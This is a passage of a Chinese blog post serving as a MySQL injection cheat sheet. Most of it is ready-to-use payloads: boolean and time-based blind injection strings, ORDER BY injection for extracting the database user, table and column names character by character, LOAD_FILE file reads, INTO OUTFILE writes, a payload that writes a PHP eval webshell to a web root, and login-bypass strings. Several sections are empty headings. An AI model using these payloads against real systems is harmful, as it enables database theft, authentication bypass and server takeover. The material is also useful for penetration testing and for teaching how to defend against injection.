<h3 id="multilinestring"><a href="#multilinestring" class="headerlink" title="multilinestring()"></a>multilinestring()</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line"></span><br></pre></td></tr></table></figure>
<h3 id="exp"><a href="#exp" class="headerlink" title="exp()"></a>exp()</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line"></span><br></pre></td></tr></table></figure>
<h2 id="盲注"><a href="#盲注" class="headerlink" title="盲注"></a>盲注</h2><h3 id="盲注场景"><a href="#盲注场景" class="headerlink" title="盲注场景"></a>盲注场景</h3><p>在许多情况下，通过前面的测试会发现页面没有回显提取的数据，但是根据语句是否执行成功与否会有一些相应的变化。</p>
<ul>
<li>正确/错误的语句使得页面有适度的变化。可以尝试使用布尔注入</li>
<li>正确语句返回正常页面，错误的语句返回通用错误页面。可以尝试使用布尔注入。</li>
<li>提交错误语句，不影响页面的正常输出。建议尝试使用延时注入。</li>
</ul>
<h3 id="布尔盲注-基于响应"><a href="#布尔盲注-基于响应" class="headerlink" title="布尔盲注-基于响应"></a>布尔盲注-基于响应</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">if(1=1,1,0)</span><br><span class="line">ascii(mid((database()),1,1))=97</span><br></pre></td></tr></table></figure>
<h4 id="xor异或注入"><a href="#xor异或注入" class="headerlink" title="xor异或注入"></a>xor异或注入</h4><h3 id="延时盲注-基于时间"><a href="#延时盲注-基于时间" class="headerlink" title="延时盲注-基于时间"></a>延时盲注-基于时间</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">1 OR SLEEP(25)=0 LIMIT 1 #</span><br><span class="line">1) OR SLEEP(25)=0 LIMIT 1 #</span><br><span class="line">1&apos; OR SLEEP(25)=0 LIMIT 1 #</span><br><span class="line">&apos;) OR SLEEP(25)=0 LIMIT 1 #</span><br><span class="line">1)) OR SLEEP(25)=0 LIMIT 1 #</span><br><span class="line">SELECT SLEEP(25) #</span><br></pre></td></tr></table></figure>
<h3 id="tips"><a href="#tips" class="headerlink" title="tips"></a>tips</h3><p>当字符串被过滤时，又没有回显的情况下，可以使用<code>length(&#39;select&#39;)=6</code>来测试是否有被过滤</p>
<h2 id="insert-update-delete注入"><a href="#insert-update-delete注入" class="headerlink" title="insert/update/delete注入"></a>insert/update/delete注入</h2><h2 id="order-by-后注入"><a href="#order-by-后注入" class="headerlink" title="order by 后注入"></a>order by 后注入</h2><p>如下order参数可控：select * from goods order by $_GET[‘order’]</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">/?order=IF(1=1,name,price) 通过name字段排序</span><br><span class="line">/?order=IF(1=2,name,price) 通过price字段排序</span><br><span class="line">/?order=(CASE+WHEN+(1=1)+THEN+name+ELSE+price+END) 通过name字段排序</span><br><span class="line">/?order=(CASE+WHEN+(1=2)+THEN+name+ELSE+price+END) 通过price字段排序</span><br><span class="line">/?order=IFNULL(NULL,price) 通过price字段排序</span><br><span class="line">/?order=IFNULL(NULL,name) 通过name字段排序</span><br></pre></td></tr></table></figure>
<p>另外利用<code>rand</code>函数也能达到类似的效果，可以观测到排序的结果不一样</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">/?order=rand(1=1) </span><br><span class="line">/?order=rand(1=2)</span><br></pre></td></tr></table></figure>
<h3 id="利用报错"><a href="#利用报错" class="headerlink" title="利用报错"></a>利用报错</h3><p>在有些情况下无法知道列名，而且也不太直观的去判断两次请求的差别，如下用IF语句为例。</p>
<h4 id="返回多条记录"><a href="#返回多条记录" class="headerlink" title="返回多条记录"></a>返回多条记录</h4><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">/?order=IF(1=1,1,(select+1+union+select+2)) 正确</span><br><span class="line">/?order=IF(1=2,1,(select+1+union+select+2)) 错误</span><br><span class="line">/?order=IF(1=1,1,(select+1+from+information_schema.tables)) 正常</span><br><span class="line">/?order=IF(1=2,1,(select+1+from+information_schema.tables)) 错误</span><br></pre></td></tr></table></figure>
<h4 id="利用regexp"><a href="#利用regexp" class="headerlink" title="利用regexp"></a>利用regexp</h4><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">/?order=(select+1+regexp+if(1=1,1,0x00)) 正常</span><br><span class="line">/?order=(select+1+regexp+if(1=2,1,0x00)) 错误</span><br></pre></td></tr></table></figure>
<h4 id="利用updatexml"><a href="#利用updatexml" class="headerlink" title="利用updatexml"></a>利用updatexml</h4><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">/?order=updatexml(1,if(1=1,1,user()),1) 正确</span><br><span class="line">/?order=updatexml(1,if(1=2,1,user()),1) 错误</span><br></pre></td></tr></table></figure>
<h4 id="利用extractvalue"><a href="#利用extractvalue" class="headerlink" title="利用extractvalue"></a>利用extractvalue</h4><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">/?order=extractvalue(1,if(1=1,1,user())) 正确</span><br><span class="line">/?order=extractvalue(1,if(1=2,1,user())) 错误</span><br></pre></td></tr></table></figure>
<h3 id="基于时间的盲注"><a href="#基于时间的盲注" class="headerlink" title="基于时间的盲注"></a>基于时间的盲注</h3><p>注意如果直接<code>if(1=2,1,SLEEP(2))</code>，sleep时间将会变成2当前表中记录的数目，还有比如执行<code>BENCHMARK(1000000,100100)</code>;等函数，将会对<a href="https://www.secpulse.com/archives/tag/服务器" target="_blank" rel="noopener">服务器</a>造成一定的<a href="https://www.secpulse.com/archives/tag/拒绝服务攻击" target="_blank" rel="noopener">拒绝服务攻击</a>。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">/?order=if(1=1,1,(SELECT(1)FROM(SELECT(SLEEP(2)))test)) 正常响应时间</span><br><span class="line">/?order=if(1=2,1,(SELECT(1)FROM(SELECT(SLEEP(2)))test)) sleep 2秒</span><br></pre></td></tr></table></figure>
<h3 id="数据猜解"><a href="#数据猜解" class="headerlink" title="数据猜解"></a>数据猜解</h3><p>以猜解<code>user()</code>即<code>root@localhost</code>为例子，由于只能一位一位猜解，可以利用<code>SUBSTR</code>,<code>SUBSTRING</code>,<code>MID</code>,以及<code>left</code>和<code>right</code>可以精准分割出每一位子串。然后就是比较操作了可以利用<code>=</code>,<code>like</code>,<code>regexp</code>等。这里要注意<code>like</code>是不区分大小写。</p>
<p>通过下可以得知<code>user()</code>第一位为<code>r</code>,<code>ascii</code>码的16进制为<code>0x72</code>：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">/?order=(select+1+regexp+if(substring(user(),1,1)=0x72,1,0x00)) 正确</span><br><span class="line">/?order=(select+1+regexp+if(substring(user(),1,1)=0x71,1,0x00)) 错误</span><br></pre></td></tr></table></figure>
<h3 id="猜解当前数据库的表名："><a href="#猜解当前数据库的表名：" class="headerlink" title="猜解当前数据库的表名："></a>猜解当前数据库的表名：</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">/?order=(select+1+regexp+if(substring((select+concat(table_name)from+information_schema.tables+where+table_schema%3ddatabase()+limit+0,1),1,1)=0x67,1,0x00)) 正确</span><br><span class="line">/?order=(select+1+regexp+if(substring((select+concat(table_name)from+information_schema.tables+where+table_schema%3ddatabase()+limit+0,1),1,1)=0x66,1,0x00)) 错误</span><br></pre></td></tr></table></figure>
<h3 id="猜解指定表名中的列名："><a href="#猜解指定表名中的列名：" class="headerlink" title="猜解指定表名中的列名："></a>猜解指定表名中的列名：</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">/?order=(select+1+regexp+if(substring((select+concat(column_name)from+information_schema.columns+where+table_schema%3ddatabase()+and+table_name%3d0x676f6f6473+limit+0,1),1,1)=0x69,1,0x00)) 正常</span><br><span class="line">/?order=(select+1+regexp+if(substring((select+concat(column_name)from+information_schema.columns+where+table_schema%3ddatabase()+and+table_name%3d0x676f6f6473+limit+0,1),1,1)=0x68,1,0x00)) 错误</span><br></pre></td></tr></table></figure>
<h2 id="二次注入"><a href="#二次注入" class="headerlink" title="二次注入"></a>二次注入</h2><h2 id="文件读写"><a href="#文件读写" class="headerlink" title="文件读写"></a>文件读写</h2><p>利用sql注入可以导入导出文件，获取文件内容，或向文件写入内容。<br>查询用户读写权限：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">SELECT file_priv FROM mysql.user WHERE user = &apos;username&apos;;</span><br></pre></td></tr></table></figure>
<h3 id="load-file-读取"><a href="#load-file-读取" class="headerlink" title="load_file()读取"></a>load_file()读取</h3><h4 id="条件"><a href="#条件" class="headerlink" title="条件"></a>条件</h4><ul>
<li>需要有读取文件的权限</li>
<li>需要知道文件的绝对物理路径。</li>
<li>要读取的文件大小必须小于 max_allowed_packet</li>
</ul>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">SELECT @@max_allowed_packet;</span><br></pre></td></tr></table></figure>
<h4 id="payload"><a href="#payload" class="headerlink" title="payload"></a>payload</h4><p>直接使用绝对路径,注意对路径中斜杠的处理。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">UNION SELECT LOAD_FILE(&quot;C://TEST.txt&quot;) #</span><br><span class="line"></span><br><span class="line">UNION SELECT LOAD_FILE(&quot;C:/TEST.txt&quot;) #</span><br><span class="line"></span><br><span class="line">UNION SELECT LOAD_FILE(&quot;C:\\TEST.txt&quot;) #</span><br></pre></td></tr></table></figure>
<p>使用编码</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">UNION SELECT LOAD_FILE(CHAR(67,58,92,92,84,69,83,84,46,116,120,116)) #</span><br><span class="line"></span><br><span class="line">UNION SELECT LOAD_FILE(0x433a5c5c544553542e747874) #</span><br></pre></td></tr></table></figure>
<p>不过在<code>mysql5.7</code>时候<code>secure_file_priv为NULL</code>，所以无法读出</p>
<h3 id="into-outfile"><a href="#into-outfile" class="headerlink" title="into outfile"></a>into outfile</h3><h4 id="条件-1"><a href="#条件-1" class="headerlink" title="条件"></a>条件</h4><ul>
<li>要知道网站绝对路径，可以通过报错，phpinfo界面，404界面等一些方式知道</li>
<li>要有file权限，默认情况下只有root有</li>
<li>对目录要有写权限，一般image之类的存放突破的目录就有</li>
</ul>
<h4 id="payload-1"><a href="#payload-1" class="headerlink" title="payload"></a>payload</h4><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">UNION SELECT DATABASE() INTO OUTFILE &apos;C:\\phpstudy\\WWW\\test\\1&apos;;</span><br><span class="line"></span><br><span class="line">UNION SELECT DATABASE() INTO OUTFILE &apos;C:/phpstudy/WWW/test/1&apos;;</span><br></pre></td></tr></table></figure>
<h4 id="写入webshell"><a href="#写入webshell" class="headerlink" title="写入webshell"></a>写入webshell</h4><h5 id="条件-2"><a href="#条件-2" class="headerlink" title="条件"></a>条件</h5><ul>
<li>需要知道网站的绝对物理路径，这样导出后的webshell可访问</li>
<li>对需导出的目录有可写权限。</li>
</ul>
<h5 id="payload-2"><a href="#payload-2" class="headerlink" title="payload"></a>payload</h5><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">UNION SELECT  &quot;&lt;?php eval($_POST[&apos;chybeta&apos;])?&gt;&quot; INTO OUTFILE &apos;C:/phpstudy/WWW/test/webshell.php&apos;;</span><br></pre></td></tr></table></figure>
<h2 id="万能密码后台登陆"><a href="#万能密码后台登陆" class="headerlink" title="万能密码后台登陆"></a>万能密码后台登陆</h2><ul>
<li>admin’– </li>
<li>admin’#</li>
<li>admin’/*</li>
<li>or ‘=’ or</li>
<li>‘ or 1=1– </li>
<li>‘’ or 1=1#</li>
<li>‘ or 1=1/*</li>
<li>‘) or ‘1’=’1– </li>
<li>‘) or (‘1’=’1– </li>
</ul>

      
    </div>
    
    
    

	<div>
      
        
<div class="my_post_copyright">
  <script src="//cdn.bootcss.com/clipboard.js/1.5.10/clipboard.min.js"></script>
  
  <!-- JS库 sweetalert 可修改路径 -->
  <script src="https://cdn.bootcss.com/jquery/2.0.0/jquery.min.js"></script>
  <script src="https://unpkg.com/sweetalert/dist/sweetalert.min.js"></script>
  <p><span>本文标题:</span><a href="/2019/01/25/mysql注入备忘录/">mysql注入备忘录</a></p>
  <p><span>文章作者:</span><a href="/" title="访问 xianyu123 的个人博客">xianyu123</a></p>
  <p><span>发布时间:</span>2019年01月25日 - 21:57</p>
  <p><span>最后更新:</span>2019年10月18日 - 09:52</p>
  <p><span>原始链接:</span><a href="/2019/01/25/mysql注入备忘录/" title="mysql注入备忘录">http://0clickjacking0.github.io/2019/01/25/mysql注入备忘录/</a>
    <span class="copy-path" title="点击复制文章链接"><i class="fa fa-clipboard" data-clipboard-text="http://0clickjacking0.github.io/2019/01/25/mysql注入备忘录/" aria-label="复制成功！"></i></span>
  </p>
  <p><span>许可协议:</span><i class="fa fa-creative-commons"></i> <a rel="license" href="https://creativecommons.org/licenses/by-nc-nd/4.0/" target="_blank" title="Attribution-NonCommercial-NoDerivatives 4.0 International (CC BY-NC-ND 4.0)">署名-非商业性使用-禁止演绎 4.0 国际</a> 转载请保留原文链接及作者。</p>  
</div>
<script> 
    var clipboard = new Clipboard('.fa-clipboard');
    $(".fa-clipboard").click(function(){
      clipboard.on('success', function(){
        swal({   
          title: "",   
          text: '复制成功',
          icon: "success", 
          showConfirmButton: true
          });
	});
    });  
</script>


      
</div>


    

    

    

	
	<div>
  
    <div>
    
        <div style="text-align:center;color: #ccc;font-size:14px;">-------------　　　　本文结束　<i class="fa fa-heart"></i>　感谢您的阅读　　　　-------------</div>
    
</div>
  
</div>
	
	
    <footer class="post-footer">
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2018/12/31/分享几个windows和linux文件传输的方法/" rel="next" title="分享几个windows和linux文件传输的方法">
                <i class="fa fa-chevron-left"></i> 分享几个windows和linux文件传输的方法
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2019/01/29/sql注入绕过技巧-积累中/" rel="prev" title="sql注入绕过技巧(积累中)">
                sql注入绕过技巧(积累中) <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  
    <div class="comments" id="comments">
    </div>
  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            站点概览
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <p class="site-author-name" itemprop="name">xianyu123</p>
              <p class="site-description motion-element" itemprop="description"></p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives/">
              
                  <span class="site-state-item-count">28</span>
                  <span class="site-state-item-name">日志</span>
                </a>
              </div>
            

            
              
              
              <div class="site-state-item site-state-categories">
                <a href="/categories/index.html">
                  <span class="site-state-item-count">6</span>
                  <span class="site-state-item-name">分类</span>
                </a>
              </div>
            

            

          </nav>

          
            <div class="feed-link motion-element">
              <a href="/atom.xml" rel="alternate">
                <i class="fa fa-rss"></i>
                RSS
              </a>
            </div>
          

          

          
          

          
          
            <div class="links-of-blogroll motion-element links-of-blogroll-inline">
              <div class="links-of-blogroll-title">
                <i class="fa  fa-fw fa-link"></i>
                友情链接
              </div>
              <ul class="links-of-blogroll-list">
                
                  <li class="links-of-blogroll-item">
                    <a href="https://only-free.github.io/" title="小彪" target="_blank">小彪</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="http://www.kr1sten.cn/" title="K神" target="_blank">K神</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="http://charon.xin/" title="Char0n" target="_blank">Char0n</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://tgaout.github.io/categories/" title="TGAO" target="_blank">TGAO</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://brownfly.github.io/" title="Insomnia" target="_blank">Insomnia</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://r0co.top/" title="r0co" target="_blank">r0co</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="http://blog.ragdoll.work/" title="死肥宅" target="_blank">死肥宅</a>
                  </li>
                
              </ul>
            </div>
          

          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#基本"><span class="nav-number">1.</span> <span class="nav-text">基本</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#information-schema"><span class="nav-number">1.1.</span> <span class="nav-text">information_schema</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#查看当前系统版本"><span class="nav-number">1.2.</span> <span class="nav-text">查看当前系统版本</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#查看当前数据库版本"><span class="nav-number">1.3.</span> <span class="nav-text">查看当前数据库版本</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#当前登录用户"><span class="nav-number">1.4.</span> <span class="nav-text">当前登录用户</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#当前使用的数据库"><span class="nav-number">1.5.</span> <span class="nav-text">当前使用的数据库</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#路径相关"><span class="nav-number">1.6.</span> <span class="nav-text">路径相关</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#联合数据"><span class="nav-number">1.7.</span> <span class="nav-text">联合数据</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#字母-数字相关"><span class="nav-number">1.8.</span> <span class="nav-text">字母/数字相关</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#字符串截取"><span class="nav-number">1.9.</span> <span class="nav-text">字符串截取</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#注释"><span class="nav-number">1.10.</span> <span class="nav-text">注释</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#字符串运算符"><span class="nav-number">1.11.</span> <span class="nav-text">字符串运算符</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#注入技术"><span class="nav-number">2.</span> <span class="nav-text">注入技术</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#判断是否存在注入"><span class="nav-number">2.1.</span> <span class="nav-text">判断是否存在注入</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#数值型注入"><span class="nav-number">2.1.1.</span> <span class="nav-text">数值型注入</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#字符型注入"><span class="nav-number">2.1.2.</span> <span class="nav-text">字符型注入</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#联合查询"><span class="nav-number">2.2.</span> <span class="nav-text">联合查询</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#库"><span class="nav-number">2.2.1.</span> <span class="nav-text">库</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#库名长度"><span class="nav-number">2.2.1.1.</span> <span class="nav-text">库名长度</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#当前库名"><span class="nav-number">2.2.1.2.</span> <span class="nav-text">当前库名</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#所以库名"><span class="nav-number">2.2.1.3.</span> <span class="nav-text">所以库名</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#表"><span class="nav-number">2.2.2.</span> <span class="nav-text">表</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#表的张数"><span class="nav-number">2.2.2.1.</span> <span class="nav-text">表的张数</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#表名的长度"><span class="nav-number">2.2.2.2.</span> <span class="nav-text">表名的长度</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#表名"><span class="nav-number">2.2.2.3.</span> <span class="nav-text">表名</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#列"><span class="nav-number">2.2.3.</span> <span class="nav-text">列</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#列的个数"><span class="nav-number">2.2.3.1.</span> <span class="nav-text">列的个数</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#列名的长度"><span class="nav-number">2.2.3.2.</span> <span class="nav-text">列名的长度</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#列名"><span class="nav-number">2.2.3.3.</span> <span class="nav-text">列名</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#值"><span class="nav-number">2.2.4.</span> <span class="nav-text">值</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#值的个数"><span class="nav-number">2.2.4.1.</span> <span class="nav-text">值的个数</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#值的长度"><span class="nav-number">2.2.4.2.</span> <span class="nav-text">值的长度</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#值-1"><span class="nav-number">2.2.4.3.</span> <span class="nav-text">值</span></a></li></ol></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#报错注入"><span class="nav-number">2.3.</span> <span class="nav-text">报错注入</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#floor"><span class="nav-number">2.3.1.</span> <span class="nav-text">floor()</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#extractvalue-有长度限制-最长32位"><span class="nav-number">2.3.2.</span> <span class="nav-text">extractvalue()(有长度限制,最长32位)</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#updatexml-有长度限制-最长32位"><span class="nav-number">2.3.3.</span> <span class="nav-text">updatexml()(有长度限制,最长32位)</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#geometrycollection"><span class="nav-number">2.3.4.</span> <span class="nav-text">geometrycollection()</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#multipoint"><span class="nav-number">2.3.5.</span> <span class="nav-text">multipoint()</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#polygon"><span class="nav-number">2.3.6.</span> <span class="nav-text">polygon()</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#multipolygon"><span class="nav-number">2.3.7.</span> <span class="nav-text">multipolygon()</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#linestring"><span class="nav-number">2.3.8.</span> <span class="nav-text">linestring()</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#multilinestring"><span class="nav-number">2.3.9.</span> <span class="nav-text">multilinestring()</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#exp"><span class="nav-number">2.3.10.</span> <span class="nav-text">exp()</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#盲注"><span class="nav-number">2.4.</span> <span class="nav-text">盲注</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#盲注场景"><span class="nav-number">2.4.1.</span> <span class="nav-text">盲注场景</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#布尔盲注-基于响应"><span class="nav-number">2.4.2.</span> <span class="nav-text">布尔盲注-基于响应</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#xor异或注入"><span class="nav-number">2.4.2.1.</span> <span class="nav-text">xor异或注入</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#延时盲注-基于时间"><span class="nav-number">2.4.3.</span> <span class="nav-text">延时盲注-基于时间</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#tips"><span class="nav-number">2.4.4.</span> <span class="nav-text">tips</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#insert-update-delete注入"><span class="nav-number">2.5.</span> <span class="nav-text">insert/update/delete注入</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#order-by-后注入"><span class="nav-number">2.6.</span> <span class="nav-text">order by 后注入</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#利用报错"><span class="nav-number">2.6.1.</span> <span class="nav-text">利用报错</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#返回多条记录"><span class="nav-number">2.6.1.1.</span> <span class="nav-text">返回多条记录</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#利用regexp"><span class="nav-number">2.6.1.2.</span> <span class="nav-text">利用regexp</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#利用updatexml"><span class="nav-number">2.6.1.3.</span> <span class="nav-text">利用updatexml</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#利用extractvalue"><span class="nav-number">2.6.1.4.</span> <span class="nav-text">利用extractvalue</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#基于时间的盲注"><span class="nav-number">2.6.2.</span> <span class="nav-text">基于时间的盲注</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#数据猜解"><span class="nav-number">2.6.3.</span> <span class="nav-text">数据猜解</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#猜解当前数据库的表名："><span class="nav-number">2.6.4.</span> <span class="nav-text">猜解当前数据库的表名：</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#猜解指定表名中的列名："><span class="nav-number">2.6.5.</span> <span class="nav-text">猜解指定表名中的列名：</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#二次注入"><span class="nav-number">2.7.</span> <span class="nav-text">二次注入</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#文件读写"><span class="nav-number">2.8.</span> <span class="nav-text">文件读写</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#load-file-读取"><span class="nav-number">2.8.1.</span> <span class="nav-text">load_file()读取</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#条件"><span class="nav-number">2.8.1.1.</span> <span class="nav-text">条件</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#payload"><span class="nav-number">2.8.1.2.</span> <span class="nav-text">payload</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#into-outfile"><span class="nav-number">2.8.2.</span> <span class="nav-text">into outfile</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#条件-1"><span class="nav-number">2.8.2.1.</span> <span class="nav-text">条件</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#payload-1"><span class="nav-number">2.8.2.2.</span> <span class="nav-text">payload</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#写入webshell"><span class="nav-number">2.8.2.3.</span> <span class="nav-text">写入webshell</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#条件-2"><span class="nav-number">2.8.2.3.1.</span> <span class="nav-text">条件</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#payload-2"><span class="nav-number">2.8.2.3.2.</span> <span class="nav-text">payload</span></a></li></ol></li></ol></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#万能密码后台登陆"><span class="nav-number">2.9.</span> <span class="nav-text">万能密码后台登陆</span></a></li></ol></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2019</span>
  <span class="with-love">
   
  </span>
